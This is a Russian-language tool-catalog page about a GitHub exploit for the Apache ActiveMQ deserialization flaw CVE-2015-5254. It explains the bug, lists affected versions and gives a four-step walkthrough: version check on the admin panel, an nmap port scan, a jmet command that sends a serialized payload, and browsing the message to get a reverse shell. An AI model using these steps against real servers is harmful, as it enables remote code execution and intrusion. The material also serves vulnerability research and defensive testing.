Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ActiveMQ_CVE-2015-5254 — ActiveMQ_CVE-2015-5254 | Kitploit
Инструменты/GitHubGitHub/ma1dong/activemq_cve-2015-5254
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationRemote Access Tool
GitHubma1dong/activemq_cve-2015-5254

ActiveMQ_CVE-2015-5254

ActiveMQ_CVE-2015-5254

Репозиторий
216 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

ActiveMQ反序列化 (CVE-2015-5254)

Описание уязвимости: В Apache ActiveMQ версий 5.x до 5.13.0 существует уязвимость безопасности, вызванная тем, что программа не ограничивает классы, которые могут быть сериализованы в брокере. Удаленный злоумышленник может выполнить произвольный код с помощью специально созданного сериализованного объекта Java Message Service (JMS) ObjectMessage.

Затрагиваемые версии: Apache ActiveMQ 5.x до 5.13.0

0x01 Вход в панель управления для проверки версии: http://IP:8161

Изображение версии

0x02 Определение открытого порта 61616: nmap -sV -Pn -T4 -sC -p 61616 IP Изображение порта 61616

0x03 Отправка реверсивного payload: java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "xxx" -Yp ROME IP 61616 Изображение реверс-шелла

0x04 Щелкните, чтобы вызвать Browse event - Message ID, успешное получение реверс-шелла: http://IP:8161/admin/message.jsp?id=ID&JMSDestination=event Изображение успешного реверс-шелла

Рекомендации по исправлению: обновиться до последней версии, настроить правила WAF для блокировки.

Скачать инструмент